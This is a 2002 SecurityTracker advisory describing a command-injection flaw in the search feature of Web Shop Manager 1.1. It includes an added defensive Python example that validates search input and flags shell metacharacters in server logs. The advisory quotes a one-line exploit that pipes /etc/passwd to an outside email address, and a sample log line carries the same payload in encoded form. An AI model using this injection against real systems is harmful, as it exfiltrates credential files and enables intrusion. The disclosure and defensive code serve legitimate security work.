Category:   Application (Commerce)  >   Web Shop Manager
Vendors:   Web Drive Limited
Web Shop Manager Input Validation Bug Lets Remote Users Execute Commands on the System
SecurityTracker Alert ID:  1004969
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 6 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   An input filtering flaw was reported in Web Drive Limited's Web Shop Manager. A remote user can execute commands on the system.

SecurityBugware reported a remote command execution bug in Web Shop Manager v1.1. The software apparently does not filter certain characters from user-supplied input in the 'search' function. A remote user can supply a pipe character followed by system commands to execute commands on the system.

A demonstration exploit command to mail the password file on a Unix/Linux system to a remote user is provided:

|mail email@address < /etc/passwd

SecurityBugware credits Tacettin Karadeniz [tacettinkaradeniz at] with reporting the flaw.
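The flaw described above is shell metacharacter injection through the search parameter. As an added illustration (not code from Web Drive Limited or from the original report), the following shows the two defender-side controls a practitioner would want: an allowlist validator with an in-process search that never hands the term to a shell, and a detection routine that flags web-server log requests whose decoded search parameter carries shell metacharacters. The script name, catalogue entries, addresses and log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allowlist for a catalogue search term: letters, digits, space, dot, dash.
# Any other character, including the pipe the advisory describes, is rejected.
_SAFE_TERM = re.compile(r"[A-Za-z0-9 .\-]{1,64}")
# Characters that let /bin/sh chain or redirect commands.
SHELL_META = frozenset("|;&`$<>()\n")

# Constructed in-memory catalogue standing in for the shop's product list.
CATALOG = ["Blue Widget", "Red Widget", "Green Gadget"]

def is_safe_search_term(term: str) -> bool:
    """True only when the whole term matches the allowlist."""
    return _SAFE_TERM.fullmatch(term) is not None

def search_catalog(term: str) -> list[str]:
    """Hardened search: validate first, then match in-process so no shell is
    ever involved and no character in `term` can be interpreted by one."""
    if not is_safe_search_term(term):
        raise ValueError("search term contains disallowed characters")
    needle = term.lower()
    return [item for item in CATALOG if needle in item.lower()]

def suspicious_search_requests(log_lines: list[str]) -> list[tuple[str, str]]:
    """Detection: return (client_ip, decoded_term) for requests whose 'search'
    parameter contains shell metacharacters after URL decoding."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        for value in parse_qs(urlsplit(m.group(1)).query).get("search", []):
            if SHELL_META.intersection(value):
                hits.append((line.split()[0], value))
    return hits

# Constructed access-log lines (script name and addresses are assumed; the
# second request carries the URL-encoded form of the payload quoted above).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Aug/2002:10:01:02 +0000] "GET /search.php?search=widget HTTP/1.0" 200 512',
    '203.0.113.9 - - [06/Aug/2002:10:01:07 +0000] '
    '"GET /search.php?search=%7Cmail+user%40example.com+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 17',
]

if __name__ == "__main__":
    print(search_catalog("widget"))
    print(suspicious_search_requests(SAMPLE_LOG))
```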

Impact:   A remote user can execute arbitrary commands on the system with the privileges of the web server CGI process.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.

 Source Message Contents

Subject:  Web Shop Manager

SecurityBugware reported a remote command execution bug in Web Shop
Manager v1.1.

According to the report:

Tacettin Karadeniz [] found that a remote
user can place some commands in the php-webshop-manager product's search
feature to cause the server to send arbitrary files (such as the
password file) to any e-mail address.  A demonstration exploit command
is provided:
   |mail < /etc/passwd
The vendor's URL is:

